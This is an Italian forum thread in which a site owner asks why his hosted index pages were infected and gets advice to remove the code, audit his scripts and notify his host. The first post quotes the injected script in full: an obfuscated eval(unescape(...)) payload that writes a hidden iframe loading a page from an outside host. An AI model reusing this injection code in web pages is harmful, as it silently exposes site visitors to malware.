Visualizzazione dei risultati da 1 a 5 su 5
  1. #1

    virus sulle index dei miei siti...(no statistiche)

    Ciao ragazzi ho un grosso problema e non capisco veramente perchè, ho un spazio web su servage dove ospito parecchi siti, ieri è successa una cosa assurda tutte le index.php/index.html/home.php/home.html si sono infettate con un virus una stringa di codice mai inserita e vista.... è questa:

    <body><script>eval(unescape("%77%69%6e%64%6f%77%2e %73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%6 3%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66% 72%61%6d%65%20%6e%61%6d%65%3d%36%39%64%20%73%72%63 %3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6 c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70% 68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d %61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%3 7%31%30%29%2b%27%34%65%61%62%5c%27%20%77%69%64%74% 68%3d%35%38%33%20%68%65%69%67%68%74%3d%33%37%30%20 %73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%2 0%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e% 27%29")); </script>
    <table width="1%" border="0" align="center" cellpadding="0" cellspacing="0">

    ma che diavolo è ??? è come è possibile ???

    Denuncio il server che mi ospita ???

    AweDesign "power & Creation"
    Tecnical supp:info@awedesign.net
    sito:http://www.awedesign.net

  2. #2
    Utente di HTML.it L'avatar di Tux7000
    Registrato dal
    Feb 2008
    residenza
    Milano
    Messaggi
    620
    Leggi qui
    http://forum.html.it/forum/showthrea...readid=1128984
    e toglila immediatamente.

  3. #3
    caspita l'ho elimintato da alcune pagine in cui era presente ma mi chiedo com'è possibile che su una pagina html senza script particolari possono inserire un scrip così senza il mio permesso (ma la gente non ha niente da fare) :rollo:

    C'è una soluzione ? oppure devo ogni giorno controllare l'intero codice sperando di non ritrovare un'altra cosa del genere all'interno

    Grazie per l'aiuto
    AweDesign "power & Creation"
    Tecnical supp:info@awedesign.net
    sito:http://www.awedesign.net

  4. #4
    Amministratore L'avatar di Vincent.Zeno
    Registrato dal
    May 2003
    residenza
    Emilia-Romagna (tortellini und cappelletti land!)
    Messaggi
    20,664
    Originariamente inviato da awetop
    C'è una soluzione ?
    controllare la vulnerabilità dei tuoi script e
    avvisare l'assistenza che hai subito un attacco.

    non devi denunciare il server se loro non sono i responsabili...

    anzi: prima li informi meglio è per tutti voi, clients e webfarm.

    collaborare è meglio!

  5. #5
    Utente bannato
    Registrato dal
    Feb 2008
    Messaggi
    910
    Se hai inserito un contatore visite gratuito molto probabilmente la causa è quello

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.